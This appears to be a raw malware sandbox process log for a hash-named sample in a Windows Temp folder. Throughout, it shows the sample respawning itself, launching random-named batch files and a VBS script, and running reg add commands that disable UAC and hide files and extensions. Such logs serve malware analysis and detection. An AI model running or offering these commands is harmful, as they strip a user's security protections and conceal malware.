cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-897312723-179116586347957918914212337941012119365-575955322-977739556538644422"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1585858678134878694-4329983391455858552-9047406632585850401950038754561563785"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2002840291-744457640-589974179-1434134956-19838075432107869803-1227632892-884813411"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "704562590-585285965-377786896-1328209219903737704-772817530-1064819093-142454218"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19243831581432487016838186580-1208101387551380418-583093998315879403-788769682"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2078166580-19389559911292402187-373443740922846530-17403182861745428509-1817076594"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1464464388357939922-3056601989027792417774761571967089542-933394529987516035"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-794179335-1350961775-14197859451460564036-2038009802-133731579317543756781608977565"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "733794590-409830049-19425671791302348956-2044380983111066871415487563931642118925"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1310731163500083244-1855368625-1335343528-16817510041534493641597817377-1050035658"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jwQQkIYw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QAEMIcMY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\UqkcEogQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jOowgccM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XaocYAws.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\OEsUcEwY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uMAUEgws.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AMksUMQI.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\bKAcgwIU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vqkcocMY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\aKYIAUso.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZOMIUsYc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zmcYYgEk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\HGIYccUs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\xGQUkkoE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\lwcUUMQI.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XMEsgoYw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wWAoEIYw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ywgYMAEk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\xqAQMwAA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\cwUAsAEk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\oUAkQQAA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\naQwIEoE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\YegYQAME.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XaosYIgQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\BGcsgsQI.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\TQggIEoE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XucwwoYw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nmMAsIok.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SQIYwcEg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\mEcEMIQE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\YkIkAcEg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hsIAEwsk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
